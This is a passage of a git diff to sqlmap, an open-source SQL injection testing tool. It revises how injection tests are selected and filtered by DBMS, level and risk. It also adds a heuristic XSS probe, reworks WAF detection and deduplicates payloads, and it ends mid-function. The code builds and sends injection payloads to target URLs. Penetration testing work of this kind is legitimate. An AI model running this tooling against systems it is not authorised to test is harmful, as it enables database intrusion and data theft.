-    for test in getSortedInjectionTests():
+    paramType = conf.method if conf.method not in (None, HTTPMETHOD.GET, HTTPMETHOD.POST) else place
+    tests = getSortedInjectionTests()
+    seenPayload = set()
+
+    while tests:
+        test = tests.pop(0)
+
         try:
             if kb.endDetection:
                 break
 
             if conf.dbms is None:
+                # If the DBMS has not yet been fingerprinted (via simple heuristic check
+                # or via DBMS-specific payload) and boolean-based blind has been identified
+                # then attempt to identify with a simple DBMS specific boolean-based
+                # test what the DBMS may be
                 if not injection.dbms and PAYLOAD.TECHNIQUE.BOOLEAN in injection.data:
-                    if not Backend.getIdentifiedDbms() and not kb.heuristicDbms:
-                        kb.heuristicDbms = heuristicCheckDbms(injection) or UNKNOWN_DBMS
+                    if not Backend.getIdentifiedDbms() and kb.heuristicDbms is False:
+                        kb.heuristicDbms = heuristicCheckDbms(injection)
 
-                if not conf.testFilter and (Backend.getErrorParsedDBMSes() or kb.heuristicDbms) not in ([], None, UNKNOWN_DBMS):
-                    if kb.reduceTests is None and Backend.getErrorParsedDBMSes():
-                        msg = "heuristic (parsing) test showed that the "
-                        msg += "back-end DBMS could be '%s'. " % (Format.getErrorParsedDBMSes() if Backend.getErrorParsedDBMSes() else kb.heuristicDbms)
-                        msg += "Do you want to skip test payloads specific for other DBMSes? [Y/n]"
-                        kb.reduceTests = [] if readInput(msg, default='Y').upper() != 'Y' else (Backend.getErrorParsedDBMSes() or [kb.heuristicDbms])
+                # If the DBMS has already been fingerprinted (via DBMS-specific
+                # error message, simple heuristic check or via DBMS-specific
+                # payload), ask the user to limit the tests to the fingerprinted
+                # DBMS
+                if kb.reduceTests is None and not conf.testFilter and (intersect(Backend.getErrorParsedDBMSes(), \
+                   SUPPORTED_DBMS, True) or kb.heuristicDbms or injection.dbms):
+                    msg = "it looks like the back-end DBMS is '%s'. " % (Format.getErrorParsedDBMSes() or kb.heuristicDbms or injection.dbms)
+                    msg += "Do you want to skip test payloads specific for other DBMSes? [Y/n]"
+                    kb.reduceTests = (Backend.getErrorParsedDBMSes() or [kb.heuristicDbms]) if readInput(msg, default='Y').upper() == 'Y' else []
 
-                    if kb.extendTests is None:
-                        _ = (Format.getErrorParsedDBMSes() if Backend.getErrorParsedDBMSes() else kb.heuristicDbms)
-                        msg = "do you want to include all tests for '%s' " % _
-                        msg += "extending provided level (%d) and risk (%s)? [Y/n]" % (conf.level, conf.risk)
-                        kb.extendTests = [] if readInput(msg, default='Y').upper() != 'Y' else (Backend.getErrorParsedDBMSes() or [kb.heuristicDbms])
+            # If the DBMS has been fingerprinted (via DBMS-specific error
+            # message, via simple heuristic check or via DBMS-specific
+            # payload), ask the user to extend the tests to all DBMS-specific,
+            # regardless of --level and --risk values provided
+            if kb.extendTests is None and not conf.testFilter and (conf.level < 5 or conf.risk < 3) \
+               and (intersect(Backend.getErrorParsedDBMSes(), SUPPORTED_DBMS, True) or \
+               kb.heuristicDbms or injection.dbms):
+                msg = "for the remaining tests, do you want to include all tests "
+                msg += "for '%s' extending provided " % (Format.getErrorParsedDBMSes() or kb.heuristicDbms or injection.dbms)
+                msg += "level (%d)" % conf.level if conf.level < 5 else ""
+                msg += " and " if conf.level < 5 and conf.risk < 3 else ""
+                msg += "risk (%d)" % conf.risk if conf.risk < 3 else ""
+                msg += " values? [Y/n]" if conf.level < 5 and conf.risk < 3 else " value? [Y/n]"
+                kb.extendTests = (Backend.getErrorParsedDBMSes() or [kb.heuristicDbms]) if readInput(msg, default='Y').upper() == 'Y' else []
 
             title = test.title
-            stype = test.stype
+            kb.testType = stype = test.stype
             clause = test.clause
             unionExtended = False
 
@@ -165,27 +188,56 @@ def checkSqlInjection(place, parameter, value):
                 logger.debug(debugMsg)
                 continue
 
-
-            # Skip DBMS-specific test if it does not match either the
-            # previously identified or the user's provided DBMS (either
-            # from program switch or from parsed error message(s))
+            # Parse DBMS-specific payloads' details
             if "details" in test and "dbms" in test.details:
-                dbms = test.details.dbms
+                payloadDbms = test.details.dbms
             else:
-                dbms = None
+                payloadDbms = None
 
-            # Skip tests if title is not included by the given filter
-            if conf.testFilter:
-                if not any(conf.testFilter in str(item) or re.search(conf.testFilter, str(item), re.I) for item in (test.title, test.vector, dbms)):
-                    debugMsg = "skipping test '%s' because " % title
-                    debugMsg += "its name/vector/dbms is not included by the given filter"
+            # Skip tests if title, vector or DBMS is not included by the
+            # given test filter
+            if conf.testFilter and not any(conf.testFilter in str(item) or \
+               re.search(conf.testFilter, str(item), re.I) for item in \
+               (test.title, test.vector, payloadDbms)):
+                    debugMsg = "skipping test '%s' because its " % title
+                    debugMsg += "name/vector/DBMS is not included by the given filter"
                     logger.debug(debugMsg)
                     continue
 
-            elif not (kb.extendTests and intersect(dbms, kb.extendTests)):
+            if payloadDbms is not None:
+                # Skip DBMS-specific test if it does not match the user's
+                # provided DBMS
+                if conf.dbms is not None and not intersect(payloadDbms, conf.dbms, True):
+                    debugMsg = "skipping test '%s' because " % title
+                    debugMsg += "the provided DBMS is %s" % conf.dbms
+                    logger.debug(debugMsg)
+                    continue
+
+                # Skip DBMS-specific test if it does not match the
+                # previously identified DBMS (via DBMS-specific payload)
+                if injection.dbms is not None and not intersect(payloadDbms, injection.dbms, True):
+                    debugMsg = "skipping test '%s' because the identified " % title
+                    debugMsg += "back-end DBMS is %s" % injection.dbms
+                    logger.debug(debugMsg)
+                    continue
+
+                # Skip DBMS-specific test if it does not match the
+                # previously identified DBMS (via DBMS-specific error message)
+                if kb.reduceTests and not intersect(payloadDbms, kb.reduceTests, True):
+                    debugMsg = "skipping test '%s' because the parsed " % title
+                    debugMsg += "error message(s) showed that the back-end DBMS "
+                    debugMsg += "could be %s" % Format.getErrorParsedDBMSes()
+                    logger.debug(debugMsg)
+                    continue
+
+            # If the user did not decide to extend the tests to all
+            # DBMS-specific or the test payloads is not specific to the
+            # identified DBMS, then only test for it if both level and risk
+            # are below the corrisponding configuration's level and risk
+            # values
+            if not conf.testFilter and not (kb.extendTests and intersect(payloadDbms, kb.extendTests, True)):
                 # Skip test if the risk is higher than the provided (or default)
                 # value
-                # Parse test's <risk>
                 if test.risk > conf.risk:
                     debugMsg = "skipping test '%s' because the risk (%d) " % (title, test.risk)
                     debugMsg += "is higher than the provided (%d)" % conf.risk
@@ -194,35 +246,12 @@ def checkSqlInjection(place, parameter, value):
 
                 # Skip test if the level is higher than the provided (or default)
                 # value
-                # Parse test's <level>
                 if test.level > conf.level:
                     debugMsg = "skipping test '%s' because the level (%d) " % (title, test.level)
                     debugMsg += "is higher than the provided (%d)" % conf.level
                     logger.debug(debugMsg)
                     continue
 
-            if dbms is not None:
-                if injection.dbms is not None and not intersect(injection.dbms, dbms):
-                    debugMsg = "skipping test '%s' because " % title
-                    debugMsg += "the back-end DBMS identified is "
-                    debugMsg += "%s" % injection.dbms
-                    logger.debug(debugMsg)
-                    continue
-
-                if conf.dbms is not None and not intersect(conf.dbms.lower(), [_.lower() for _ in arrayizeValue(dbms)]):
-                    debugMsg = "skipping test '%s' because " % title
-                    debugMsg += "the provided DBMS is %s" % conf.dbms
-                    logger.debug(debugMsg)
-                    continue
-
-                if kb.reduceTests and not intersect(dbms, kb.reduceTests):
-                    debugMsg = "skipping test '%s' because " % title
-                    debugMsg += "the parsed error message(s) showed "
-                    debugMsg += "that the back-end DBMS could be "
-                    debugMsg += "%s" % Format.getErrorParsedDBMSes()
-                    logger.debug(debugMsg)
-                    continue
-
             # Skip test if it does not match the same SQL injection clause
             # already identified by another test
             clauseMatch = False
@@ -234,11 +263,11 @@ def checkSqlInjection(place, parameter, value):
 
             if clause != [0] and injection.clause and injection.clause != [0] and not clauseMatch:
                 debugMsg = "skipping test '%s' because the clauses " % title
-                debugMsg += "differs from the clause already identified"
+                debugMsg += "differ from the clause already identified"
                 logger.debug(debugMsg)
                 continue
 
-            # Skip test if the user provided custom character
+            # Skip test if the user provided custom character (for UNION-based payloads)
             if conf.uChar is not None and ("random number" in title or "(NULL)" in title):
                 debugMsg = "skipping test '%s' because the user " % title
                 debugMsg += "provided a specific character, %s" % conf.uChar
@@ -248,9 +277,9 @@ def checkSqlInjection(place, parameter, value):
             infoMsg = "testing '%s'" % title
             logger.info(infoMsg)
 
-            # Force back-end DBMS according to the current
-            # test value for proper payload unescaping
-            Backend.forceDbms(dbms[0] if isinstance(dbms, list) else dbms)
+            # Force back-end DBMS according to the current test DBMS value
+            # for proper payload unescaping
+            Backend.forceDbms(payloadDbms[0] if isinstance(payloadDbms, list) else payloadDbms)
 
             # Parse test's <request>
             comment = agent.getComment(test.request) if len(conf.boundaries) > 1 else None
@@ -268,7 +297,7 @@ def checkSqlInjection(place, parameter, value):
                 # Skip boundary if the level is higher than the provided (or
                 # default) value
                 # Parse boundary's <level>
-                if boundary.level > conf.level:
+                if boundary.level > conf.level and not (kb.extendTests and intersect(payloadDbms, kb.extendTests, True)):
                     continue
 
                 # Skip boundary if it does not match against test's <clause>
@@ -298,14 +327,13 @@ def checkSqlInjection(place, parameter, value):
                 # Parse boundary's <prefix>, <suffix> and <ptype>
                 prefix = boundary.prefix if boundary.prefix else ""
                 suffix = boundary.suffix if boundary.suffix else ""
+                ptype = boundary.ptype
 
                 # Options --prefix/--suffix have a higher priority (if set by user)
                 prefix = conf.prefix if conf.prefix is not None else prefix
                 suffix = conf.suffix if conf.suffix is not None else suffix
                 comment = None if conf.suffix is not None else comment
 
-                ptype = boundary.ptype
-
                 # If the previous injections succeeded, we know which prefix,
                 # suffix and parameter type to use for further tests, no
                 # need to cycle through the boundaries for the following tests
@@ -313,7 +341,9 @@ def checkSqlInjection(place, parameter, value):
                 condBound &= (injection.prefix != prefix or injection.suffix != suffix)
                 condType = injection.ptype is not None and injection.ptype != ptype
 
-                if condBound or condType:
+                # If the payload is an inline query test for it regardless
+                # of previously identified injection types
+                if stype != PAYLOAD.TECHNIQUE.QUERY and (condBound or condType):
                     continue
 
                 # For each test's <where>
@@ -334,6 +364,7 @@ def checkSqlInjection(place, parameter, value):
                         # will likely result in a different content
                         kb.data.setdefault("randomInt", str(randomInt(10)))
                         kb.data.setdefault("randomStr", str(randomStr(10)))
+
                         if conf.invalidLogical:
                             _ = int(kb.data.randomInt[:2])
                             origValue = "%s AND %s=%s" % (value, _, _ + 1)
@@ -343,6 +374,7 @@ def checkSqlInjection(place, parameter, value):
                             origValue = kb.data.randomStr[:6]
                         else:
                             origValue = "-%s" % kb.data.randomInt[:4]
+
                         templatePayload = agent.payload(place, parameter, value="", newValue=origValue, where=where)
                     elif where == PAYLOAD.WHERE.REPLACE:
                         origValue = ""
@@ -352,9 +384,17 @@ def checkSqlInjection(place, parameter, value):
                     # Forge request payload by prepending with boundary's
                     # prefix and appending the boundary's suffix to the
                     # test's ' <payload><comment> ' string
-                    boundPayload = agent.prefixQuery(fstPayload, prefix, where, clause)
-                    boundPayload = agent.suffixQuery(boundPayload, comment, suffix, where)
-                    reqPayload = agent.payload(place, parameter, newValue=boundPayload, where=where)
+                    if fstPayload:
+                        boundPayload = agent.prefixQuery(fstPayload, prefix, where, clause)
+                        boundPayload = agent.suffixQuery(boundPayload, comment, suffix, where)
+                        reqPayload = agent.payload(place, parameter, newValue=boundPayload, where=where)
+                        if reqPayload:
+                            if reqPayload in seenPayload:
+                                continue
+                            else:
+                                seenPayload.add(reqPayload)
+                    else:
+                        reqPayload = None
 
                     # Perform the test's request and check whether or not the
                     # payload was successful
@@ -389,12 +429,12 @@ def checkSqlInjection(place, parameter, value):
                             trueResult = Request.queryPage(reqPayload, place, raise404=False)
                             truePage = threadData.lastComparisonPage or ""
 
-                            if trueResult:
+                            if trueResult and not(truePage == falsePage and not kb.nullConnection):
                                 falseResult = Request.queryPage(genCmpPayload(), place, raise404=False)
 
                                 # Perform the test's False request
                                 if not falseResult:
-                                    infoMsg = "%s parameter '%s' seems to be '%s' injectable " % (place, parameter, title)
+                                    infoMsg = "%s parameter '%s' seems to be '%s' injectable " % (paramType, parameter, title)
                                     logger.info(infoMsg)
 
                                     injectable = True
@@ -403,9 +443,10 @@ def checkSqlInjection(place, parameter, value):
                                 trueSet = set(extractTextTagContent(truePage))
                                 falseSet = set(extractTextTagContent(falsePage))
                                 candidates = filter(None, (_.strip() if _.strip() in (kb.pageTemplate or "") and _.strip() not in falsePage and _.strip() not in threadData.lastComparisonHeaders else None for _ in (trueSet - falseSet)))
+
                                 if candidates:
                                     conf.string = candidates[0]
-                                    infoMsg = "%s parameter '%s' seems to be '%s' injectable (with --string=\"%s\")" % (place, parameter, title, repr(conf.string).lstrip('u').strip("'"))
+                                    infoMsg = "%s parameter '%s' seems to be '%s' injectable (with --string=\"%s\")" % (paramType, parameter, title, repr(conf.string).lstrip('u').strip("'"))
                                     logger.info(infoMsg)
 
                                     injectable = True
@@ -428,7 +469,7 @@ def checkSqlInjection(place, parameter, value):
                                     result = output == "1"
 
                                     if result:
-                                        infoMsg = "%s parameter '%s' is '%s' injectable " % (place, parameter, title)
+                                        infoMsg = "%s parameter '%s' is '%s' injectable " % (paramType, parameter, title)
                                         logger.info(infoMsg)
 
                                         injectable = True
@@ -450,7 +491,7 @@ def checkSqlInjection(place, parameter, value):
                                 trueResult = Request.queryPage(reqPayload, place, timeBasedCompare=True, raise404=False)
 
                                 if trueResult:
-                                    infoMsg = "%s parameter '%s' seems to be '%s' injectable " % (place, parameter, title)
+                                    infoMsg = "%s parameter '%s' seems to be '%s' injectable " % (paramType, parameter, title)
                                     logger.info(infoMsg)
 
                                     injectable = True
@@ -466,7 +507,7 @@ def checkSqlInjection(place, parameter, value):
                             configUnion(test.request.char, test.request.columns)
 
                             if not Backend.getIdentifiedDbms():
-                                if kb.heuristicDbms in (None, UNKNOWN_DBMS):
+                                if kb.heuristicDbms is None:
                                     warnMsg = "using unescaped version of the test "
                                     warnMsg += "because of zero knowledge of the "
                                     warnMsg += "back-end DBMS. You can try to "
@@ -476,17 +517,28 @@ def checkSqlInjection(place, parameter, value):
                                     Backend.forceDbms(kb.heuristicDbms)
 
                             if unionExtended:
-                                infoMsg = "automatically extending ranges "
-                                infoMsg += "for UNION query injection technique tests as "
+                                infoMsg = "automatically extending ranges for UNION "
+                                infoMsg += "query injection technique tests as "
                                 infoMsg += "there is at least one other (potential) "
                                 infoMsg += "technique found"
                                 singleTimeLogMessage(infoMsg)
+                            elif not injection.data:
+                                _ = test.request.columns.split('-')[-1]
+                                if _.isdigit() and int(_) > 10:
+                                    if kb.futileUnion is None:
+                                        msg = "it is not recommended to perform "
+                                        msg += "extended UNION tests if there is not "
+                                        msg += "at least one other (potential) "
+                                        msg += "technique found. Do you want to skip? [Y/n] "
+                                        kb.futileUnion = readInput(msg, default="Y").strip().upper() == 'N'
+                                    if kb.futileUnion is False:
+                                        continue
 
                             # Test for UNION query SQL injection
                             reqPayload, vector = unionTest(comment, place, parameter, value, prefix, suffix)
 
                             if isinstance(reqPayload, basestring):
-                                infoMsg = "%s parameter '%s' is '%s' injectable" % (place, parameter, title)
+                                infoMsg = "%s parameter '%s' is '%s' injectable" % (paramType, parameter, title)
                                 logger.info(infoMsg)
 
                                 injectable = True
@@ -497,7 +549,7 @@ def checkSqlInjection(place, parameter, value):
 
                         kb.previousMethod = method
 
-                        if conf.dummy:
+                        if conf.dummy or conf.offline:
                             injectable = False
 
                     # If the injection test was successful feed the injection
@@ -522,12 +574,15 @@ def checkSqlInjection(place, parameter, value):
                             for dKey, dValue in test.details.items():
                                 if dKey == "dbms":
                                     injection.dbms = dValue
+
                                     if not isinstance(dValue, list):
                                         Backend.setDbms(dValue)
                                     else:
                                         Backend.forceDbms(dValue[0], True)
+
                                 elif dKey == "dbms_version" and injection.dbms_version is None and not conf.testFilter:
                                     injection.dbms_version = Backend.setVersion(dValue)
+
                                 elif dKey == "os" and injection.os is None:
                                     injection.os = Backend.setOs(dValue)
 
@@ -592,6 +647,7 @@ def checkSqlInjection(place, parameter, value):
                     choice = readInput(msg, default=str(conf.verbose), checkBatch=False).strip()
                 conf.verbose = int(choice)
                 setVerbosity()
+                tests.insert(0, test)
             elif choice[0] in ("n", "N"):
                 return None
             elif choice[0] in ("e", "E"):
@@ -627,13 +683,22 @@ def checkSqlInjection(place, parameter, value):
     return injection
 
 def heuristicCheckDbms(injection):
-    retVal = None
+    """
+    This functions is called when boolean-based blind is identified with a
+    generic payload and the DBMS has not yet been fingerprinted to attempt
+    to identify with a simple DBMS specific boolean-based test what the DBMS
+    may be
+    """
+    retVal = False
 
     pushValue(kb.injection)
     kb.injection = injection
-    randStr1, randStr2 = randomStr(), randomStr()
 
     for dbms in getPublicTypeMembers(DBMS, True):
+        if not FROM_DUMMY_TABLE.get(dbms, ""):
+            continue
+
+        randStr1, randStr2 = randomStr(), randomStr()
         Backend.forceDbms(dbms)
 
         if checkBooleanExpression("(SELECT '%s'%s)='%s'" % (randStr1, FROM_DUMMY_TABLE.get(dbms, ""), randStr1)):
@@ -645,7 +710,7 @@ def heuristicCheckDbms(injection):
     kb.injection = popValue()
 
     if retVal:
-        infoMsg = "heuristic (extended) test shows that the back-end DBMS "  # not as important as "parsing" counter-part (because of false-positives)
+        infoMsg = "heuristic (extended) test shows that the back-end DBMS "  # Not as important as "parsing" counter-part (because of false-positives)
         infoMsg += "could be '%s' " % retVal
         logger.info(infoMsg)
 
@@ -658,7 +723,8 @@ def checkFalsePositives(injection):
 
     retVal = injection
 
-    if all(_ in (PAYLOAD.TECHNIQUE.BOOLEAN, PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED) for _ in injection.data):
+    if all(_ in (PAYLOAD.TECHNIQUE.BOOLEAN, PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED) for _ in injection.data) or\
+      (len(injection.data) == 1 and PAYLOAD.TECHNIQUE.UNION in injection.data and "Generic" in injection.data[PAYLOAD.TECHNIQUE.UNION].title):
         pushValue(kb.injection)
 
         infoMsg = "checking if the injection point on %s " % injection.place
@@ -671,16 +737,14 @@ def checkFalsePositives(injection):
         kb.injection = injection
 
         for i in xrange(conf.level):
-            randInt1, randInt2, randInt3 = (_() for j in xrange(3))
+            while True:
+                randInt1, randInt2, randInt3 = (_() for j in xrange(3))
 
-            randInt1 = min(randInt1, randInt2, randInt3)
-            randInt3 = max(randInt1, randInt2, randInt3)
+                randInt1 = min(randInt1, randInt2, randInt3)
+                randInt3 = max(randInt1, randInt2, randInt3)
 
-            while randInt1 >= randInt2:
-                randInt2 = _()
-
-            while randInt2 >= randInt3:
-                randInt3 = _()
+                if randInt3 > randInt2 > randInt1:
+                    break
 
             if not checkBooleanExpression("%d=%d" % (randInt1, randInt1)):
                 retVal = None
@@ -763,20 +827,12 @@ def checkFilteredChars(injection):
 
 def heuristicCheckSqlInjection(place, parameter):
     if kb.nullConnection:
-        debugMsg = "heuristic check skipped "
-        debugMsg += "because NULL connection used"
-        logger.debug(debugMsg)
-        return None
-
-    if wasLastResponseDBMSError():
-        debugMsg = "heuristic check skipped "
-        debugMsg += "because original page content "
-        debugMsg += "contains DBMS error"
+        debugMsg = "heuristic check skipped because NULL connection used"
         logger.debug(debugMsg)
         return None
 
     origValue = conf.paramDict[place][parameter]
-
+    paramType = conf.method if conf.method not in (None, HTTPMETHOD.GET, HTTPMETHOD.POST) else place
     prefix = ""
     suffix = ""
 
@@ -788,6 +844,7 @@ def heuristicCheckSqlInjection(place, parameter):
             suffix = conf.suffix
 
     randStr = ""
+
     while '\'' not in randStr:
         randStr = randomStr(length=10, alphabet=HEURISTIC_CHECK_ALPHABET)
 
@@ -802,8 +859,8 @@ def heuristicCheckSqlInjection(place, parameter):
     parseFilePaths(page)
     result = wasLastResponseDBMSError()
 
-    infoMsg = "heuristic (basic) test shows that %s " % place
-    infoMsg += "parameter '%s' might " % parameter
+    infoMsg = "heuristic (basic) test shows that %s parameter " % paramType
+    infoMsg += "'%s' might " % parameter
 
     def _(page):
         return any(_ in (page or "") for _ in FORMAT_EXCEPTION_STRINGS)
@@ -844,6 +901,22 @@ def heuristicCheckSqlInjection(place, parameter):
         infoMsg += "not be injectable"
         logger.warn(infoMsg)
 
+    kb.heuristicMode = True
+
+    value = "%s%s%s" % (randomStr(), DUMMY_XSS_CHECK_APPENDIX, randomStr())
+    payload = "%s%s%s" % (prefix, "'%s" % value, suffix)
+    payload = agent.payload(place, parameter, newValue=payload)
+    page, _ = Request.queryPage(payload, place, content=True, raise404=False)
+
+    paramType = conf.method if conf.method not in (None, HTTPMETHOD.GET, HTTPMETHOD.POST) else place
+
+    if value in (page or ""):
+        infoMsg = "heuristic (XSS) test shows that %s parameter " % paramType
+        infoMsg += "'%s' might be vulnerable to XSS attacks" % parameter
+        logger.info(infoMsg)
+
+    kb.heuristicMode = False
+
     return kb.heuristicTest
 
 def checkDynParam(place, parameter, value):
@@ -860,7 +933,9 @@ def checkDynParam(place, parameter, value):
     dynResult = None
     randInt = randomInt()
 
-    infoMsg = "testing if %s parameter '%s' is dynamic" % (place, parameter)
+    paramType = conf.method if conf.method not in (None, HTTPMETHOD.GET, HTTPMETHOD.POST) else place
+
+    infoMsg = "testing if %s parameter '%s' is dynamic" % (paramType, parameter)
     logger.info(infoMsg)
 
     try:
@@ -868,7 +943,7 @@ def checkDynParam(place, parameter, value):
         dynResult = Request.queryPage(payload, place, raise404=False)
 
         if not dynResult:
-            infoMsg = "confirming that %s parameter '%s' is dynamic" % (place, parameter)
+            infoMsg = "confirming that %s parameter '%s' is dynamic" % (paramType, parameter)
             logger.info(infoMsg)
 
             randInt = randomInt()
@@ -937,11 +1012,15 @@ def checkStability():
     like for instance string matching (--string).
     """
 
-    infoMsg = "testing if the target URL is stable. This can take a couple of seconds"
+    infoMsg = "testing if the target URL is stable"
     logger.info(infoMsg)
 
     firstPage = kb.originalPage  # set inside checkConnection()
-    time.sleep(1)
+
+    delay = 1 - (time.time() - (kb.originalPageTime or 0))
+    delay = max(0, min(1, delay))
+    time.sleep(delay)
+
     secondPage, _ = Request.queryPage(content=True, raise404=False)
 
     if kb.redirectChoice:
@@ -1060,59 +1139,38 @@ def checkWaf():
     Reference: http://seclists.org/nmap-dev/2011/q2/att-1005/http-waf-detect.nse
     """
 
-    if not conf.checkWaf:
-        return False
+    if any((conf.string, conf.notString, conf.regexp, conf.dummy, conf.offline)):
+        return None
 
-    infoMsg = "heuristically checking if the target is protected by "
-    infoMsg += "some kind of WAF/IPS/IDS"
-    logger.info(infoMsg)
+    dbmMsg = "heuristically checking if the target is protected by "
+    dbmMsg += "some kind of WAF/IPS/IDS"
+    logger.debug(dbmMsg)
 
     retVal = False
-
-    backup = dict(conf.parameters)
-
     payload = "%d %s" % (randomInt(), IDS_WAF_CHECK_PAYLOAD)
 
-    conf.parameters = dict(backup)
-    conf.parameters[PLACE.GET] = "" if not conf.parameters.get(PLACE.GET) else conf.parameters[PLACE.GET] + "&"
-    conf.parameters[PLACE.GET] += "%s=%s" % (randomStr(), payload)
+    value = "" if not conf.parameters.get(PLACE.GET) else conf.parameters[PLACE.GET] + DEFAULT_GET_POST_DELIMITER
+    value += agent.addPayloadDelimiters("%s=%s" % (randomStr(), payload))
 
-    logger.log(CUSTOM_LOGGING.PAYLOAD, payload)
-
-    kb.matchRatio = None
-    Request.queryPage()
-
-    if kb.errorIsNone and kb.matchRatio is None:
-        kb.matchRatio = LOWER_RATIO_BOUND
-
-    conf.parameters = dict(backup)
-    conf.parameters[PLACE.GET] = "" if not conf.parameters.get(PLACE.GET) else conf.parameters[PLACE.GET] + "&"
-    conf.parameters[PLACE.GET] += "%s=%d" % (randomStr(), randomInt())
-
-    trueResult = Request.queryPage()
-
-    if trueResult:
-        conf.parameters = dict(backup)
-        conf.parameters[PLACE.GET] = "" if not conf.parameters.get(PLACE.GET) else conf.parameters[PLACE.GET] + "&"
-        conf.parameters[PLACE.GET] += "%s=%d %s" % (randomStr(), randomInt(), IDS_WAF_CHECK_PAYLOAD)
-
-        try:
-            falseResult = Request.queryPage()
-        except SqlmapConnectionException:
-            falseResult = None
-
-        if not falseResult:
-            retVal = True
-
-    conf.parameters = dict(backup)
+    try:
+        retVal = Request.queryPage(place=PLACE.GET, value=value, getRatioValue=True, noteResponseTime=False, silent=True)[1] < IDS_WAF_CHECK_RATIO
+    except SqlmapConnectionException:
+        retVal = True
+    finally:
+        kb.matchRatio = None
 
     if retVal:
-        warnMsg = "it appears that the target is protected. Please "
-        warnMsg += "consider usage of tamper scripts (option '--tamper')"
-        logger.warn(warnMsg)
-    else:
-        infoMsg = "it appears that the target is not protected"
-        logger.info(infoMsg)
+        warnMsg = "heuristics detected that the target "
+        warnMsg += "is protected by some kind of WAF/IPS/IDS"
+        logger.critical(warnMsg)
+
+        if not conf.identifyWaf:
+            message = "do you want sqlmap to try to detect backend "
+            message += "WAF/IPS/IDS? [y/N] "
+            output = readInput(message, default="N")
+
+            if output and output[0] in ("Y", "y"):
+                conf.identifyWaf = True
 
     return retVal
 
@@ -1130,6 +1188,8 @@ def identifyWaf():
     def _(*args, **kwargs):
         page, headers, code = None, None, None
         try:
+            pushValue(kb.redirectChoice)
+            kb.redirectChoice = REDIRECTION.NO
             if kwargs.get("get"):
                 kwargs["get"] = urlencode(kwargs["get"])
             kwargs["raise404"] = False
@@ -1137,6 +1197,8 @@ def identifyWaf():
             page, headers, code = Request.getPage(*args, **kwargs)
         except Exception:
             pass
+        finally:
+            kb.redirectChoice = popValue()
         return page or "", headers or {}, code
 
     retVal = False
@@ -1168,9 +1230,10 @@ def identifyWaf():
         if output and output[0] not in ("Y", "y"):
             raise SqlmapUserQuitException
     else:
-        infoMsg = "no WAF/IDS/IPS product has been identified"
-        logger.info(infoMsg)
+        warnMsg = "no WAF/IDS/IPS product has been identified"
+        logger.warn(warnMsg)
 
+    kb.testType = None
     kb.testMode = False
 
     return retVal
@@ -1186,10 +1249,10 @@ def checkNullConnection():
     infoMsg = "testing NULL connection to the target URL"
     logger.info(infoMsg)
 
-    pushValue(kb.pageCompress)
-    kb.pageCompress = False
-
     try:
+        pushValue(kb.pageCompress)
+        kb.pageCompress = False
+
         page, headers, _ = Request.getPage(method=HTTPMETHOD.HEAD)
 
         if not page and HTTP_HEADER.CONTENT_LENGTH in (headers or {}):
@@ -1219,27 +1282,31 @@ def checkNullConnection():
         errMsg = getUnicode(errMsg)
         raise SqlmapConnectionException(errMsg)
 
-    kb.pageCompress = popValue()
+    finally:
+        kb.pageCompress = popValue()
 
     return kb.nullConnection is not None
 
 def checkConnection(suppressOutput=False):
-    if not any((conf.proxy, conf.tor, conf.dummy)):
+    if not any((conf.proxy, conf.tor, conf.dummy, conf.offline)):
         try:
+            debugMsg = "resolving hostname '%s'" % conf.hostname
+            logger.debug(debugMsg)
             socket.getaddrinfo(conf.hostname, None)
         except socket.gaierror:
             errMsg = "host '%s' does not exist" % conf.hostname
             raise SqlmapConnectionException(errMsg)
         except socket.error, ex:
             errMsg = "problem occurred while "
-            errMsg += "resolving a host name '%s' ('%s')" % (conf.hostname, str(ex))
+            errMsg += "resolving a host name '%s' ('%s')" % (conf.hostname, ex.message)
             raise SqlmapConnectionException(errMsg)
 
-    if not suppressOutput and not conf.dummy:
+    if not suppressOutput and not conf.dummy and not conf.offline:
         infoMsg = "testing connection to the target URL"
         logger.info(infoMsg)
 
     try:
+        kb.originalPageTime = time.time()
         page, _ = Request.queryPage(content=True, noteResponseTime=False)
         kb.originalPage = kb.pageTemplate = page
 
diff --git a/lib/controller/controller.py b/lib/controller/controller.py
index e57330d96..d5793767c 100644
--- a/lib/controller/controller.py
+++ b/lib/controller/controller.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
@@ -28,7 +28,10 @@ from lib.core.common import getUnicode
 from lib.core.common import hashDBRetrieve
 from lib.core.common import hashDBWrite
 from lib.core.common import intersect
+from lib.core.common import isListLike
 from lib.core.common import parseTargetUrl
+from lib.core.common import popValue
+from lib.core.common import pushValue
 from lib.core.common import randomStr
 from lib.core.common import readInput
 from lib.core.common import safeCSValue
@@ -126,8 +129,8 @@ def _selectInjection():
         kb.injection = kb.injections[index]
 
 def _formatInjection(inj):
-    data = "Place: %s\n" % inj.place
-    data += "Parameter: %s\n" % inj.parameter
+    paramType = conf.method if conf.method not in (None, HTTPMETHOD.GET, HTTPMETHOD.POST) else inj.place
+    data = "Parameter: %s (%s)\n" % (inj.parameter, paramType)
 
     for stype, sdata in inj.data.items():
         title = sdata.title
@@ -146,14 +149,17 @@ def _formatInjection(inj):
             vector = "%s%s" % (vector, comment)
         data += "    Type: %s\n" % PAYLOAD.SQLINJECTION[stype]
         data += "    Title: %s\n" % title
-        data += "    Payload: %s\n" % urldecode(payload, unsafe="&", plusspace=(inj.place == PLACE.POST and kb.postSpaceToPlus))
+        data += "    Payload: %s\n" % urldecode(payload, unsafe="&", plusspace=(inj.place != PLACE.GET and kb.postSpaceToPlus))
         data += "    Vector: %s\n\n" % vector if conf.verbose > 1 else "\n"
 
     return data
 
 def _showInjections():
-    header = "sqlmap identified the following injection points with "
-    header += "a total of %d HTTP(s) requests" % kb.testQueryCount
+    if kb.testQueryCount > 0:
+        header = "sqlmap identified the following injection point(s) with "
+        header += "a total of %d HTTP(s) requests" % kb.testQueryCount
+    else:
+        header = "sqlmap resumed the following injection point(s) from stored session"
 
     if hasattr(conf, "api"):
         conf.dumper.string("", kb.injections, content_type=CONTENT_TYPE.TECHNIQUES)
@@ -189,7 +195,9 @@ def _randomFillBlankFields(value):
     return retVal
 
 def _saveToHashDB():
-    injections = hashDBRetrieve(HASHDB_KEYS.KB_INJECTIONS, True) or []
